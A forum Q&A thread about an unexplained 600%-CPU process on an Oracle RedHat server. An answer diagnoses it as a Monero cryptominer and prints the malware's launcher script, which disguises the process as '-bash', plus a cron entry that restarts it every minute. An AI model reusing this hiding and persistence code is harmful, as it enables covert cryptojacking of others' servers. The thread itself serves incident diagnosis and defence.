# why do i have that unnatural process on my server

Tags: oracle

i have an abnormal process on my RedHat server i tried to kill it but it appears again and because of that process i can't start my fusion middleware

any ideas please
when I execute the command TOP that line appear

```
pid     user               cpu   command
31183   oracle            598     .
```

Answer (score 2):

I have seen something similar to this once on a clients system about 1,5 years ago, in
2019 January.
The symptoms were also similar. Even the 600% CPU usage was the same.

In that case, the command was disguised as `ld-linux-x86-64`, not `.`, something like this:

```
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
23971 oracle    20   0  592404   5616   4788 S 593,8  0,0  20:40.20 ld-linux-x86-64
```

`top` does not display the whole command in its output.

If the command used is `ld-linux-x86-64                                                                                                                                                                                                                                                    something` (with lot of spaces), then if your terminal is not big enough, `top` will just display `ld-linux-x86-64`          with some spaces until the end of line.

However, checking with `ps`, I was able to see the whole command (I trimmed some of the spaces for readability).

```
ps -ef | grep 23971

oracle   23971     1 99 16:53 ?        00:21:37 -bash ...          ... --library-path stak stak/xmrig
```

The owners of this server (dont ask me why) allowed direct SSH access from public internet to this server. The password of `oracle` user was also quite simple. The process belonged to a cryptocurrency malware, and if I remember correct, it was mining Monero cryptocurrency. I also found the remote address it sent it in `less /home/oracle/.ssh/stak/config.json`.

This is how it hid itself (I removed the remote server address and credential from the script below...):

```
$ cat /home/oracle/.ssh/run
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xxx.xxx.xxx.xxx:xxxx -u ... -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig >>/dev/null &
fi
echo $! > bash.pid
```

Killing it did not stop it as it scheduled itself in `cron` and checked itself every minute:

```
$ crontab -l
* * * * * /home/oracle/.ssh/upd >/dev/null 2>&1
```

To be honest, I do not think this is an Oracle issue...

Comment: Thank you so much for your replay i think it's a virus and unfortunately, i should 
reinstall the server because I couldn't find it (the virus)... what do you think should i reinstall the server or looking for another solution?

Comment: @ilham This was just a guess from me, I am not saying you have a virus for sure. But from the amount of information we have about your system and symptoms, reinstalling  it may simply solve your problem.